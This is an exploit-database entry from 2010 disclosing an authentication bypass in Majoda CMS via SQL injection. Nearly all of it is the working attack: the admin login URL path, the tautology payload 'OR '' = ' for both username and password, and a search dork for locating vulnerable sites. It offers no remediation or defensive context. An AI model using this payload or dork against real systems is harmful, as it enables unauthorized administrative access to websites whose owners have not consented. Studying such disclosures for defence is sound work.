id: 11132
date: 02/28/2010
title: Majoda CMS (Auth Bypass) SQL Injection Vulnerability
author: Phenom
cves: 

====================================================
Majoda CMS (Auth Bypass) SQL Injection Vulnerability
====================================================

# Exploit Title: Majoda CMS (Auth Bypass) SQL Injection Vulnerability
# Date: 2010-02-28
# Author: Phenom
# Tested on: windows xp sp3

############### Majoda CMS (Auth Bypass) SQL Injection Vulnerability ###########################
#
#       Author : Phenom
#      
#
#       Dork : "Majoda CMS"
#
################################################################################################

####### Exploit ################################################################################
#
#      http://site/admin/index.asp
#
#      AnvDndarnamn(Username) : 'OR '' = '
#      LZhsenord(password)     : 'OR '' = '
#
################################################################################################



#  0day.today [2023-03-21]  #